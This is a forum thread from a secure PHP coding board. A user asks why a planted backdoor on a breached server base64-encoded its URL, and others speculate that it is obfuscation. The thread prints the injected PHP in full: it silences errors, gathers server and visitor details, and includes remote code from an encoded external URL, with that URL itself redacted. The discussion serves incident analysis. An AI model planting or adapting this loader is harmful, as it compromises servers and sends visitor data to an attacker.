A Q about someone's code injection..

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
User avatar
Jenk
DevNet Master
Posts: 3587
Joined: Mon Sep 19, 2005 6:24 am
Location: London

A Q about someone's code injection..

Post by Jenk »

Recently a server that I did some work on was breached and two PHP files added to a directory.

The contents of these files were different but both completed the same task - they gathered various $_SERVER info and then included from a russian url with the info in the get var's.

Anyway - the one thing that struck me was the script kiddies use of base64_encode() to 'mask' the url?!

The last bit puzzled me somewhat.. was this a weak attempt at obscurification, or is there some other reason (perhaps fooling include/require/php into thinking it is not actually including over http - not likely I would have thought) ?
User avatar
Buddha443556
Forum Regular
Posts: 873
Joined: Fri Mar 19, 2004 1:51 pm

Post by Buddha443556 »

Maybe the url has become the signature for the exploit and the base64 encoding is just an attempt to hide that signature? That's reaching pretty far though. Probably just trying to hide the url from your average Fantastico user who has zero programming experience.
User avatar
Maugrim_The_Reaper
DevNet Master
Posts: 2704
Joined: Tue Nov 02, 2004 5:43 am
Location: Ireland

Post by Maugrim_The_Reaper »

What does base64_decode() say? Its likely just an obscuration measure - base64 isn't all that hard to decode. Also makes it easier to pass some data without being affected by url encodings.
User avatar
Jenk
DevNet Master
Posts: 3587
Joined: Mon Sep 19, 2005 6:24 am
Location: London

Post by Jenk »

It's the url to a ruski site along with the info collected from $_SERVER, this is what was injected into one of the files, nothing malicious here, but obviously we don't know what is in the include's:

Code: Select all

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode(/* removed */).base64_decode(/* removed */)."/?".$str))){} else {include(base64_decode(/* removed */).base64_decode(/* removed */)."/?".$str);} ?>
Where /* removed */ was the url broken into two and 64 encoded. (The if challenge has two different URL's)
Post Reply